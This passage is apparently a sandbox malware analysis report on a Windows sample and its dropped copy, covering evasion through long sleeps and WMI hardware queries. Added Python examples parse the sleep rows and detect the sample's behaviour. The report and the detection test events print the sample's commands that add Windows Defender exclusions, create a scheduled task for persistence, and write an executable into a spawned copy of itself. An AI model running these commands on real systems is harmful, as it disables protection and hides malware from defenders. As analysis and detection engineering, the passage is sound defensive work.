                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\TTRef06022301.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: C:\Users\user\Desktop\TTRef06022301.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Users\user\Desktop\TTRef06022301.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Users\user\Desktop\TTRef06022301.exe TID: 2704 Thread sleep time: -44034s >= -30000s
                  Source: C:\Users\user\Desktop\TTRef06022301.exe TID: 3304 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5236 Thread sleep count: 9565 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5632 Thread sleep time: -9223372036854770s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5696 Thread sleep time: -7378697629483816s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe TID: 5676 Thread sleep time: -44034s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe TID: 3600 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\Desktop\TTRef06022301.exe TID: 4548 Thread sleep count: 1858 > 30
                  Source: C:\Users\user\Desktop\TTRef06022301.exe TID: 4388 Thread sleep time: -3689348814741908s >= -30000s
                  Source: C:\Users\user\Desktop\TTRef06022301.exe TID: 4388 Thread sleep time: -100000s >= -30000s
                  Source: C:\Users\user\Desktop\TTRef06022301.exe TID: 4388 Thread sleep time: -99859s >= -30000s
                  Source: C:\Users\user\Desktop\TTRef06022301.exe TID: 4388 Thread sleep time: -99746s >= -30000s
                  Source: C:\Users\user\Desktop\TTRef06022301.exe TID: 4388 Thread sleep time: -99631s >= -30000s
                  Source: C:\Users\user\Desktop\TTRef06022301.exe TID: 4388 Thread sleep time: -99515s >= -30000s
                  Source: C:\Users\user\Desktop\TTRef06022301.exe TID: 4388 Thread sleep time: -99406s >= -30000s
                  Source: C:\Users\user\Desktop\TTRef06022301.exe TID: 4388 Thread sleep time: -99248s >= -30000s
                  Source: C:\Users\user\Desktop\TTRef06022301.exe TID: 4388 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe TID: 1504 Thread sleep count: 911 > 30
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe TID: 4400 Thread sleep time: -2767011611056431s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe TID: 4400 Thread sleep time: -100000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe TID: 4400 Thread sleep time: -99843s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe TID: 4400 Thread sleep time: -99733s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe TID: 4400 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\TTRef06022301.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\TTRef06022301.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9565Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9313Jump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeWindow / User API: threadDelayed 1858
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeWindow / User API: threadDelayed 911
                  Source: C:\Users\user\Desktop\TTRef06022301.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\Desktop\TTRef06022301.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeThread delayed: delay time: 44034Jump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeThread delayed: delay time: 44034Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\TTRef06022301.exeThread delayed: delay time: 100000
                  Source: C:\Users\user\Desktop\TTRef06022301.exeThread delayed: delay time: 99859
                  Source: C:\Users\user\Desktop\TTRef06022301.exeThread delayed: delay time: 99746
                  Source: C:\Users\user\Desktop\TTRef06022301.exeThread delayed: delay time: 99631
                  Source: C:\Users\user\Desktop\TTRef06022301.exeThread delayed: delay time: 99515
                  Source: C:\Users\user\Desktop\TTRef06022301.exeThread delayed: delay time: 99406
                  Source: C:\Users\user\Desktop\TTRef06022301.exeThread delayed: delay time: 99248
                  Source: C:\Users\user\Desktop\TTRef06022301.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeThread delayed: delay time: 100000
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeThread delayed: delay time: 99843
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeThread delayed: delay time: 99733
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeThread delayed: delay time: 922337203685477
                  Source: TTRef06022301.exe, 00000008.00000003.282832205.0000000001062000.00000004.00000020.00020000.00000000.sdmp, iJyzakGsXF.exe, 00000014.00000003.336831683.0000000001226000.00000004.00000020.00020000.00000000.sdmp, iJyzakGsXF.exe, 00000014.00000002.501452553.000000000123A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Desktop\TTRef06022301.exeMemory allocated: page read and write | page guardJump to behavior
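The sleep rows above report the interval the sample handed to the kernel, sign included. NtDelayExecution takes a signed 64-bit count of 100 ns ticks, negative meaning "relative to now", and |INT64_MIN| // 10,000 is exactly 922337203685477, the magnitude in the report's largest rows: those calls request the longest relative sleep the API can express, roughly 29,000 years. The "sleep count" rows show the other common pattern, a loop of many short sleeps that a sandbox may skip. The decoder below is an added example, not part of the Joe Sandbox report: it groups the rows per process and thread and applies the report's own thresholds (>= 30000 and count > 30). The sample rows are copied from the report; the tag names and the 10^12 cut-off for "effectively infinite" are this example's own choices.

```python
"""Decode the sleep rows a sandbox reports for a sample (added example).

NtDelayExecution/Sleep take a signed 64-bit interval in 100 ns ticks, negative
meaning "relative to now". |INT64_MIN| // 10_000 is 922_337_203_685_477, the
magnitude printed in the report's largest rows, so those calls ask for the
longest relative sleep the API can express: an effectively infinite stall.
"""
import re
from dataclasses import dataclass

INT64_MIN = -(2 ** 63)
TICKS_PER_MS = 10_000                 # 100 ns ticks in one millisecond
LONG_SLEEP = 30_000                   # the report's ">= -30000" threshold
LOOP_THRESHOLD = 30                   # the report's "count > 30" threshold
EFFECTIVELY_INFINITE = 10 ** 12       # cut-off chosen here; no real wait is this long

# The regexes tolerate the missing separator between source path and observation.
SLEEP_TIME = re.compile(r"Source: (.+?) TID: (\d+)\s*Thread sleep time: -(\d+)s")
SLEEP_COUNT = re.compile(r"Source: (.+?) TID: (\d+)\s*Thread sleep count: (\d+)")


def ticks_to_ms(interval: int) -> int:
    """Magnitude of a relative NtDelayExecution interval, in milliseconds."""
    return abs(interval) // TICKS_PER_MS


@dataclass
class ThreadSleeps:
    process: str
    tid: int
    max_delay: int = 0      # largest single interval seen (report units)
    long_sleeps: int = 0    # intervals in [LONG_SLEEP, EFFECTIVELY_INFINITE)
    sleep_calls: int = 0    # largest "sleep count" reported for the thread


def parse_sleep_rows(rows):
    """Group the report's sleep rows per (process, thread)."""
    threads = {}
    for row in rows:
        if m := SLEEP_TIME.search(row):
            proc, tid, delay = m.group(1), int(m.group(2)), int(m.group(3))
            t = threads.setdefault((proc, tid), ThreadSleeps(proc, tid))
            t.max_delay = max(t.max_delay, delay)
            if LONG_SLEEP <= delay < EFFECTIVELY_INFINITE:
                t.long_sleeps += 1
        elif m := SLEEP_COUNT.search(row):
            proc, tid, n = m.group(1), int(m.group(2)), int(m.group(3))
            t = threads.setdefault((proc, tid), ThreadSleeps(proc, tid))
            t.sleep_calls = max(t.sleep_calls, n)
    return threads


def verdict(t: ThreadSleeps):
    """Evasion tags for one thread, derived from the thresholds above."""
    tags = []
    if t.max_delay >= EFFECTIVELY_INFINITE:
        tags.append("infinite-sleep")
    if t.long_sleeps:
        tags.append("long-sleep")
    if t.sleep_calls > LOOP_THRESHOLD:
        tags.append("sleep-loop")
    return tags


# Rows copied from the report (a representative subset).
SAMPLE_ROWS = [
    "Source: C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe TID: 5632Thread sleep time: -9223372036854770s >= -30000s",
    "Source: C:\\Users\\user\\Desktop\\TTRef06022301.exe TID: 4548Thread sleep count: 1858 > 30",
    "Source: C:\\Users\\user\\Desktop\\TTRef06022301.exe TID: 4388Thread sleep time: -3689348814741908s >= -30000s",
    "Source: C:\\Users\\user\\Desktop\\TTRef06022301.exe TID: 4388Thread sleep time: -100000s >= -30000s",
    "Source: C:\\Users\\user\\Desktop\\TTRef06022301.exe TID: 4388Thread sleep time: -99859s >= -30000s",
    "Source: C:\\Users\\user\\Desktop\\TTRef06022301.exe TID: 4388Thread sleep time: -922337203685477s >= -30000s",
    "Source: C:\\Users\\user\\AppData\\Roaming\\iJyzakGsXF.exe TID: 5676Thread sleep time: -44034s >= -30000s",
]


def analyse(rows=SAMPLE_ROWS):
    """Map each (process, tid) to its evasion tags."""
    return {key: verdict(t) for key, t in parse_sleep_rows(rows).items()}


if __name__ == "__main__":
    for (proc, tid), tags in analyse().items():
        print(f"{proc} TID {tid}: {', '.join(tags) or 'no sleep evasion'}")
```

The values in the -7378697629483816 and -3689348814741908 rows are not exact INT64_MIN fractions, which is why the classifier uses a magnitude cut-off rather than matching the constant; any of these magnitudes is far beyond a wait a program could mean literally.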

                  HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe | Memory written: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\TTRef06022301.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TTRef06022301.exe"
Source: C:\Users\user\Desktop\TTRef06022301.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\iJyzakGsXF.exe"
Source: C:\Users\user\Desktop\TTRef06022301.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TTRef06022301.exe"
Source: C:\Users\user\Desktop\TTRef06022301.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\iJyzakGsXF.exe"
Source: C:\Users\user\Desktop\TTRef06022301.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TTRef06022301.exe"
Source: C:\Users\user\Desktop\TTRef06022301.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\iJyzakGsXF.exe"
Source: C:\Users\user\Desktop\TTRef06022301.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iJyzakGsXF" /XML "C:\Users\user\AppData\Local\Temp\tmp685E.tmp"
Source: C:\Users\user\Desktop\TTRef06022301.exe | Process created: C:\Users\user\Desktop\TTRef06022301.exe C:\Users\user\Desktop\TTRef06022301.exe
Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iJyzakGsXF" /XML "C:\Users\user\AppData\Local\Temp\tmpC6BA.tmp"
Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe | Process created: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe C:\Users\user\AppData\Roaming\iJyzakGsXF.exe
Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe | Process created: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe C:\Users\user\AppData\Roaming\iJyzakGsXF.exe
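The process-creation rows above carry three of the report's headline behaviours in one place: Windows Defender exclusions added through Add-MpPreference for both the sample and its dropped copy, a scheduled task created from an XML file in the user's Temp directory, and the sample spawning a second copy of its own image (the Memory written row shows an MZ header being written into that child at base 0x400000). The rule set below is an added example, not from the report or the malware: it runs over constructed process-creation events in Sysmon Event ID 1 shape (Image, ParentImage, CommandLine) reconstructed from those rows, plus a benign control event, and then ties each scheduled task to the excluded file whose stem matches its leaf name, which is the link the report shows for iJyzakGsXF. The rule names, the self-spawn heuristic and the correlation step are this example's own.

```python
"""Rules for the defence-evasion and persistence command lines in the report
(added example). Events are constructed here in the shape a Sysmon Event ID 1
or EDR feed would give: Image, ParentImage, CommandLine.
"""
import re
from pathlib import PureWindowsPath

EXCLUSION = re.compile(r'Add-MpPreference\b.*?-ExclusionPath\s+(?:"([^"]+)"|(\S+))', re.I)
TASK_NAME = re.compile(r'/TN\s+(?:"([^"]+)"|(\S+))', re.I)
TASK_XML = re.compile(r'/XML\s+(?:"([^"]+)"|(\S+))', re.I)
TEMP_DIRS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\")


def _first(m):
    """The populated alternative of a (quoted | bare) capture pair."""
    return next(g for g in m.groups() if g is not None)


def image_name(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def check_event(ev: dict) -> list:
    """Return (rule, detail) findings for one process-creation event."""
    image, parent, cmd = ev["Image"], ev["ParentImage"], ev["CommandLine"]
    findings = []
    # Rule 1: Defender exclusion added from the command line.
    if image_name(image) == "powershell.exe" and (m := EXCLUSION.search(cmd)):
        findings.append(("defender_exclusion", _first(m)))
    # Rule 2: task registered from an XML definition living in a Temp directory.
    if image_name(image) == "schtasks.exe" and re.search(r"/create\b", cmd, re.I):
        xml = TASK_XML.search(cmd)
        if xml and any(d in _first(xml).lower() for d in TEMP_DIRS):
            tn = TASK_NAME.search(cmd)
            findings.append(("schtasks_xml_from_temp", _first(tn) if tn else _first(xml)))
    # Rule 3 (weak on its own): a process starting a second copy of its own image,
    # the precondition for the MZ write into the child that the report records.
    if image.lower() == parent.lower():
        findings.append(("self_spawn", image))
    return findings


def correlate(events):
    """Apply the rules and pair each Temp-sourced task with an excluded file
    whose stem equals the task's leaf name."""
    findings = [f for ev in events for f in check_event(ev)]
    excluded = {PureWindowsPath(p).stem: p for r, p in findings if r == "defender_exclusion"}
    tasks = {PureWindowsPath(t).name: t for r, t in findings if r == "schtasks_xml_from_temp"}
    linked = [(tasks[n], excluded[n]) for n in tasks if n in excluded]
    return findings, linked


SAMPLE = "C:\\Users\\user\\Desktop\\TTRef06022301.exe"
DROPPED = "C:\\Users\\user\\AppData\\Roaming\\iJyzakGsXF.exe"
PS = "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe"
SCHTASKS = "C:\\Windows\\SysWOW64\\schtasks.exe"

# Constructed from the report's "Process created" rows; the last event is a
# benign control (XML outside Temp) that must not fire.
SAMPLE_EVENTS = [
    {"Image": PS, "ParentImage": SAMPLE,
     "CommandLine": f'"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" Add-MpPreference -ExclusionPath "{SAMPLE}"'},
    {"Image": PS, "ParentImage": SAMPLE,
     "CommandLine": f'"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" Add-MpPreference -ExclusionPath "{DROPPED}"'},
    {"Image": SCHTASKS, "ParentImage": SAMPLE,
     "CommandLine": '"C:\\Windows\\System32\\schtasks.exe" /Create /TN "Updates\\iJyzakGsXF" /XML "C:\\Users\\user\\AppData\\Local\\Temp\\tmp685E.tmp"'},
    {"Image": SAMPLE, "ParentImage": SAMPLE, "CommandLine": SAMPLE},
    {"Image": SCHTASKS, "ParentImage": SAMPLE,
     "CommandLine": '"C:\\Windows\\System32\\schtasks.exe" /Create /TN "Backup" /XML "C:\\ProgramData\\backup.xml"'},
]


if __name__ == "__main__":
    found, linked = correlate(SAMPLE_EVENTS)
    for rule, detail in found:
        print(f"{rule:24} {detail}")
    for task, path in linked:
        print(f"task {task!r} protects excluded file {path}")
```

On a live host the two artefacts the rules key on can be confirmed directly with `(Get-MpPreference).ExclusionPath` and `Get-ScheduledTask -TaskPath "\Updates\"`; the self-spawn signal is only worth acting on together with the memory write the report records, since legitimate updaters also relaunch their own image.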
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Users\user\Desktop\TTRef06022301.exe VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
